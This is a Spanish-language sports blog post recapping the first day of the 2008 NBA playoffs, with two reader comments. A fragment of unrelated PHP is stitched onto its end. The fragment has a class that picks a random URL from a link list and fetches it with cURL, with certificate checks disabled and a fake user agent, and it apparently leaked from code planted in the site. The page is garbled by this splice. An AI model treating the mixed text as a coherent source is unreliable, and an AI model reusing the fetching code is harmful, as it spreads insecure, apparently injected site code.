Comienza el espectáculo…y de qué forma!!!

20 de April de 2008 por Gallis

Señoras y señores, con ustedes, Tim Duncan:

Esta jugada resume a la perfección el que fue, sin duda, el gran partido de la impresionante primera jornada de los Playoffs. La fe de los Spurs hizo que se llevaran un partido que los Suns tuvieron ganado en demasiadas ocasiones. La serie, con demasiadas cuentas pendientes, promete ser un espectáculo como pocas veces se ha visto. Mientras, Lebron y sus Cavs demostraron a Arenas y sus Wizards que el lugar indicado para hablar es la pista, Paul se dió su primer festín de Playoffs (asusta pensar cuantos le quedan) y los Jazz, de la mano de su nueva pareja, han tardado tan solo un partido en recuperar el factor cancha. It´s Playoff Time!!!

No hay ahora mismo en la NBA una rivalidad mayor que la que hay entre los San Antonio Spurs (1-0) y los Phoenix Suns (0-1), aunque una teoría extendida entre muchos jugadores dice que no existe rivalidad si uno de los dos equipos es incapaz de eliminar al otro. Y aunque aún queda muchísimo por jugar en esta serie (para deleite de todos), da la sensación de que a los Suns les va a costar dios y ayuda evitar una nueva decepción ante los texanos. La victoria de anoche, 117-115 tras 2 prorrogas, es un aviso al resto de la liga: Los Spurs son los campeones y si alguien quiere el anillo, tendrá que sudarlo. Los primeros 45 minutos fueros, digámoslo así, un calentamiento para lo que seguía. Los Suns dominaban el partido a pesar de los problemas de faltas de Shaq, mientras los Spurs aguantaban a duras penas gracias a Duncan (40-15-5).

A falta de 2:30 para el final San Antonio tuvo su primera ventaja de todo el partido y ambas escuadras tocaron a zafarrancho. Parker (26) y Manu (24) despertaron, mientras Oberto, Thomas y Finley se ganaban el pan haciendo su pequeña gran parte. En los Suns, Nash (25-13) se recuperó de una de las peores primeras partes que se le recuerda y se unió a la fiesta de Amare (33-7), pero el que dió un paso adelante fue Shaq (4 tapones, al menos 2 a Duncan en los minutos finales), quién hasta el final del partido dió todo un master de defensa de Playoffs con 5 faltas. Llegó el último minuto y Phoenix tuvo hasta 2 veces el balón con 3 puntos de ventaja…y perdonó. Después, un increíble fallo defensivo de Amare dejó solo a Finley. Primera prorroga. El primer tiempo extra fue un mano a mano sensacional entre Parker y Nash, pero fue el duelo Amare-Duncan el que decidió el partido. Con 3 arriba (otra vez) para los Suns Amare fue expulsado por una falta en ataque que lo sacaba del partido. Y en la última posesión llegaba el éxtasis. En una jugada que ya es parte de la historia de la NBA, Duncan anotaba su vigésimo quinto triple en 11 años de carrera, el primero de esta temporada y hacía dudar a mucha gente: Si los Spurs no ganan el anillo, tal vez la maldición del año par sea algo más que una leyenda urbana. La segunda prorroga no bajó el nivel, pero pese a los constantes intentos de Nash, incluido un triple estratosférico para empatar el partido en la penúltima posesión, Manu se encargó de certificar lo evidente. Sin duda, queda mucha serie, pero la clave ahora es ver como se recuperarán los Suns. volver a Arizona con un 2-0 a favor de los pupilos de Popovich parece, cuando menos, una temeridad.

La jornada había comenzado con otro partido que tiene pinta de haberse convertido en algo personal. Cleveland Cavaliers (1-0) derrotó una vez más a Washington Wizards (0-1), 93-86, gracias a 2 últimos minutos maravillosos de, quién sino, Lebron James (32-6-4). 3 canastas en ese período, amén de un rebote vital hicieron que los Cavs vencieran a los Wizards por séptima vez consecutiva en post temporada. Hasta ese momento, fue un típico partido de Playoff en el este. Arenas (24) había pronosticado muchos problemas para los Cavs y eso, unido a la llegada de DeShawn overrated Stevenson dió a James un extra de motivación, si es que la necesitaba. A lo largo del partido fueron muchos los piques que King James tuvo con Andray Blatche, Brendan Haywood y, como no, con Stevenson. Y la guerra no ha hecho más que empezar. Por parte de los Cavs, Ilgauskas (22-11-4) y Gibson (16-5-5) secundaron perfectamente a Lebron, mientras que Jamison fue el mejor hombre de los capitalinos (23-19), en los que esta vez flojeó Caron Butler.

En el New Orleans Arena, los Hornets (1-0) tardaron 24 minutos en darse cuenta de que los Playoffs habían comenzado (perdían de 12 al descanso), pero cuando lo hicieron fueron el mismo equipo que luchó hasta el final por el primer puesto del oeste. Los pupilos de Byron Scott derrotaron a Dallas Mavericks (0-1) por 104-92. Y como no podía ser de otra manera, la clave del partido fue la gran actuación, nada habitual en un debutante en Playoffs, de Chris Paul (35-10). El base de los Hornets anotó 15 puntos en el sensacional tercer cuarto de New Orleans, en el que enjugaron toda la desventaja y acabaron 4 arriba. Con todo por decidir, Dallas se vino abajo. Nowitzki (31-10), demasiado sólo, tan solo anotó 4 puntos durante ese período. Ni Howard (17-8), ni Kidd (11-9-9) estuvieron, pese a sus números, a la altura de lo esperado. En cambio, por parte de los locales, todo salió según lo esperado. A Paul le siguieron, como siempre, David West (23-8), Tyson Chandler (10-15) y Stojakovic (4 triples). Sin embargo, la primera parte recordó en demasia a los primeros 24 minutos del último partido de Regular Season contra los Lakers, por lo que los Hornets no deben dar nada por sentado. Queda mucha eliminatoria y pese a su leyenda de perderor, los Mavs venderán muy cara una posible derrota en esta primera ronda.

La jornada acabó con otro duelo más de la conferencia oeste. Pese a acabar en cuarta posición, Utah Jazz (1-0) afrontaba su eliminatoria contra los Houston Rockets ( 0-1) con desventaja de campo, algo que solucionaron anoche derrotando a los texanos por 82-93. La parejita Deron Williams (20-10) y Carlos Boozer (20-16) se bastaron para derrotar a los Rockets, pero por si acaso, Kirilenko (21 puntos) volvió a ser el de hace 2 temporadas. En Houston T-Mac (20-6-7) tuvo un mal día, sobre todo en el tiro. Scola (14-13) y Battier (22 puntos sin fallo) hicieron su parte, pero da la sensación de que Houston ha perdido la magia del final de la Regular Season. Poco motivos hay para pensar que Utah no sentencie esta eliminatoria ahora que el Delta Center vuelve a ser decisivo.

Hoy nos esperan otros 4 partidos, seguro que igual de emocionantes y espectaculares. Mientras tanto, os dejamos con las 10 mejores jugadas de anoche:

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Nadie podríamos discutir que el super-héroe de la primera jornada fue Duncan.
    Para el segundo puesto podríamos discutir el puesto entre Lebron y Chris Paul… y un poco más atrás Ginobili por su determinación en los momentos clave.
    Yo diría que tal y como fue el partido me quedaría con Lebron, que le dieron hasta en el carnet de identidad (aunque él tampoco se quedó manco)

    Para decepciones para mí la de Tracy McGrady con mayúsculas. Tenía la esperanza de que hiciera un buen partido y le pusiera las cosas difíciles a Utah.
    Otra decepción gorda fue el equipo de Dallas a excepción de Nowitki. Hombres como Josh Howard, Stackhouse, Jason Terry, Tyrone Lue, Eddie Jones, Devean George, Dampier (ahí es nada) tienen que ponerse las pilas si quieren tener alguna opción. Lo de anoche es para mandar a alguno al paredón.

    El premio de capullo de la jornada debería ir indiscutiblemente para Desawn Stevenson y su terrorífico partido contra el “sobrevalorado” Lebron (Desawn dixit) 3 puntejos en 38,14 min con un 1/9 en tiros deberían ser suficientes como para que mantenga cerrado el boquino desde ahora hasta el resto de su carrera profesional.

    Llama la atención también el rendimiento de los coleguis de Lebron. Big Ben debería de empezar a hacérselo mirar y diría que Joe Smith debe de estar maldiciendo el día que firmó con los Cavs. Lo cierto es que en concreto este último caso me fastidia bastante…

      Citar

  2. Viva_Dirk dice:
    #2

    Es normal que a LeBron le dieran mucho, el partido llegaba caliente por unas declaraciones de Gilbert Arenas en los dias previos al comienzo de los play-offs que decían ‘me gusta que nos halla tocado Cleveland, porque los vamos a ganar’ y semanas antes Stevenson habia dicho(en serio) que Lebron James estaba sobrevalorado. Yo confio en que sea una eliminatoria larga y en que ganen los Wizars.

    Tim Duncan anotó anoche su primer triple de la temporada, Greg Popovich preparó una jugada impensable para el resto del mundo y le salió bien, hay que darle ese mérito al entrenador jefe de los Spurs.

    Hornets VS Mavs: Derrota mas contundente de lo esperado en New Orleans, donde Chris Paul pasó por encima de Jason Kidd. Y demasiado excasa fue la ventaja cuando, exceptuando a Nowitzki, el resto de jugadores de Dallas se conjuntaron para realizar una serie de 17 de 57 en tiros, menos de un 30%.

    Rockets VS Jazzs: Llegado este punto de la temporada hace falta mas que mucho espíritu de equipo y luchar lo que se pueda. Los mormones llevaron a cabo su habitual juego táctico y de pase, lo que les dejó con buenas situaciones de tiro, un buen balance defensivo y la posibilidad de explotar todos sus recursos. Los Rockets van a necesitar a T-Mac al 110%, y Jerry Sloan no parece consentirlo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>